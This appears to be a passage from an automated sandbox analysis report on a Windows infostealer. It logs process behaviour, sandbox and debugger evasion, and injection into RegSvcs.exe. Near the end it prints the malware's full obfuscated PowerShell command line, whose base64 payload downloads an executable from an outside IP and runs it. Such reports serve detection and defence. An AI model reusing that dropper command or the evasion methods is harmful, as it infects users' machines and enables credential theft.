                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Roaming\vcc.exeAPI/Special instruction interceptor: Address: 901E84
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 6841Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6601Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3030Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\vcc.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_11-102183
                    Source: C:\Users\user\AppData\Roaming\vcc.exeAPI coverage: 4.5 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 7064Thread sleep count: 6841 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep count: 6601 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep count: 3030 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009445A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0009445A
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009C6D1 FindFirstFileW,FindClose,11_2_0009C6D1
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0009C75C
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0009EF95
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0009F0F2
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0009F3F3
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_000937EF
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00093B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00093B12
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0009BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0009BCBC
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_000349A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1382287079.0000000007E6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1382287079.0000000007E6B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1358859376.000000000282D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1379554605.0000000006E6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E
                    Source: RegSvcs.exe, 0000000C.00000002.2495839423.000000000081C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                    Source: powershell.exe, 00000003.00000002.1382287079.0000000007E45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SA^
                    Source: powershell.exe, 00000003.00000002.1360527053.0000000004907000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: C:\Users\user\AppData\Roaming\vcc.exeAPI call chain: ExitProcess graph end nodegraph_11-101022
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_025EC168 LdrInitializeThunk,LdrInitializeThunk,12_2_025EC168
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000A3F09 BlockInput,11_2_000A3F09
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00033B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00033B3A
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00065A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00065A7C
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00034B37 LoadLibraryA,GetProcAddress,11_2_00034B37
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_009020F0 mov eax, dword ptr fs:[00000030h]11_2_009020F0
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00902150 mov eax, dword ptr fs:[00000030h]11_2_00902150
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00900AA0 mov eax, dword ptr fs:[00000030h]11_2_00900AA0
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,11_2_000880A9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005A124 SetUnhandledExceptionFilter,11_2_0005A124
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_0005A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0005A155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell decode and execute
                    Source: Yara matchFile source: amsi32_5224.amsi.csv, type: OTHER
                    .NET source code references suspicious native API functions
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 11.2.vcc.exe.3290000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\vcc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 535008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000887B1 LogonUserW,11_2_000887B1
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00033B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00033B3A
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_000348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_000348D7
                    Source: C:\Users\user\AppData\Roaming\vcc.exeCode function: 11_2_00094C27 mouse_event,11_2_00094C27
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL.eXe -ex BypasS -Nop -w 1 -c DevIcecredEntIalDEPLOYmENT.eXE ; Iex($(iEx('[sYsTeM.texT.enCodING]'+[chAR]58+[Char]0x3A+'Utf8.gEtstriNG([sYStEm.cOnveRt]'+[CHaR]0X3A+[cHaR]0x3A+'fRombase64strIng('+[chaR]0x22+'JFhUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlUkRFZkluSXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEp6ZkhCcFVUcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaTXBrLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpVmFWY0lOWG8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVZuYW9lKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQmlzVkFURm9zIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTd0N6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC81NjAvdmNjLmV4ZSIsIiRlTnY6QVBQREFUQVx2Y2MuZXhlIiwwLDApO1NUQXJ0LXNMZWVQKDMpO0lOVm9LZS1JVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx2Y2MuZXhlIg=='+[chAr]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfzuxwqd\qfzuxwqd.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\vcc.exe "C:\Users\user\AppData\Roaming\vcc.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES94CA.tmp" "c:\Users\user\AppData\Local\Temp\qfzuxwqd\CSCADD237997B8E4BD496D9E414C49E4A6C.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vcc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\vcc.exe" Jump to behavior
